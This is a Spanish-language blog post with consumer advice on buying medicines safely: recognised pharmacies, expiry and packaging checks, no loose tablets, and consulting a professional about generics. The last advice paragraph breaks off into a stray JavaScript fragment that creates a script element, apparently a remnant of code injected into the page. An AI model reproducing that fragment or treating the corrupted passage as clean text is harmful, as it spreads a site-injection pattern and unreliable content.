Salud y belleza » Medicina

Las cosas que se deben tener en cuenta a la hora de comprar un medicamento…

Sin Comentarios

Más allá de cualquier tendencia actual marcada por ésta controvertida sociedad de consumo, adquirir medicamentos no es como comprar una prenda de ropa, un libro o un regalo cualquiera. Efectivamente, a la hora de obtener fármacos, sea cual sea su clase, es necesario tener en cuenta ciertas circunstancias así como también se deben analizar determinados factores.

Se sabe que, hoy por hoy, nuevamente cortesía de la ya anteriormente mencionada sociedad de consumo, la venta de medicamentos se ha tornado un tanto caprichosa y, en el afán por facilitar la distribución, en muchos casos se alzan por la ciudad locales o tiendas de procedencia dudosa.

Bien, podemos ahorrar en muchas otras salidas de compras, pera ello no pondrá en jaque la salud: comprar una blusa, jamás puede emparentarse con adquirir algo que ingresará en nuestro organismo, no desde un costado superficial, estético, sino desde un ángulo sumamente más trascendental relacionado con nuestra la salud toda.

¿Cuáles son los factores a tener en cuenta a la hora de adquirir medicamentos o fármacos?

  • Adquirir medicamentos únicamente en farmacias reconocidas.

Está comprobado que la mayoría de las medicinas falsificadas se encuentran en establecimientos clandestinos no autorizados para su venta como supermercados o, incluso, estaciones de servicio. Además, solo las farmacias cuentan con el equipo y el estudio necesario para mantener cada fármaco en condiciones óptimas.

  • Controlar el estado total del medicamento

Ante todo, la fecha de caducidad. Pero tampoco debemos hacer la vista gorda ante detalles como su envoltura (debe ser el original y no mostrar que haya sido forzado), además debe figurar explícitamente y sin enmiendas el número de lote.

  • No adquirir medicamentos fraccionados

Salvo en el caso de los denominados “de receta magistral”, el resto de los medicamentos jamás deben comprarse sueltos, en pastillas simples o de a pares de comprimidos. Nunca una tienda oficial autoriza ésta clase de ventas. Nunca adquieras tiras de medicamentos que, originalmente, hayan nacido para venderse en cajas cerradas (…que son la mayoría). Así protegerás tu salud y, a la vez, ayudarás a controlar el tráfico.

  • Consultar a un profesional antes de comprar genéricos

Se sabe: un medicamento de los llamados genéricos es una “copia” del medicamento original del laboratorio que lo desarrolló y que posee en su poder los derechos. Si bien no es cuestión de desconfiar, sí es importante hacerle una consulta al profesional de turno o nuestro médico de cabecera para conocer detalles. Se ha comprobado que, en algunos casos, diferentes marcas han perjudicado a sus clientes ya que, para ahorrar costos, vendían jarabes en cristal transparente o en tabletas sin laminado y, se sabe, a menudo, cuando eso pasa, y frente a la exposición solar, los rayos ultravioletas neutralizan ciertas propiedades de los fármacos.} else {var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.